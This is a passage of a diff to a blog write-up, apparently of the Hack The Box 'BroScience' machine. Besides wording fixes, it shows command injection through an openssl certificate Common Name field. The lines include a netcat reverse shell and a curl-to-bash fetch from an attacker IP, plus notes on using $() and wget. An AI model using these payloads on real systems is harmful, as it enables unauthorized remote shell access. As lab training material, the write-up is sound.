hanzbzz/hanzbzz.github.io/_posts/2023-04-09-HTB-broscience.md

 Common Name (e.g. server FQDN or YOUR name) []:whatever;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.169 9999 >/tmp/f;
 string is too long, it needs to be no more than 64 bytes long
 ```
 The payload is too long.
-I can deal with this by hosting the payload on a webserver:
+I can deal with this by hosting the payload on a web server:
 ```bash
 ❯ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.169 9999 >/tmp/f' > x
 ❯ python3 -m http.server
 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
 ```
-Then get the paylod using curl:
+Then get the payload using curl:
 ```bash
 Common Name (e.g. server FQDN or YOUR name) []:whatever;curl 10.10.14.169:8000/x|bash;
 ```
-Openssl accepts this, however i don't get a callback.
+Openssl accepts this, however, i don't get a callback.
 When trying out the payload manually, i notice 2 flaws:
-- Due to the parsing of the variables, bash interprets the `commonName` variable as a string.
-I can bypass this by enclosing the payload in `$()` which will run the command inside the brackets.
+- Due to the parsing of the variables, bash interprets the `commonName` variable as a string and the command doesn't get executed.
+I can bypass this by enclosing the payload in `$()`.
+When `$()` appers in a string, bash executes the command inside the brackets and replaces `$()` with the command result.
-- There is no `curl` command on the machine, however there is `wget`, so i can use that instead.
+- There is no `curl` command on the machine, however, there is `wget`, so i can use that instead.
 The final exploit looks like this:
 ```bash
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out broscience.crt -sha256 -days 1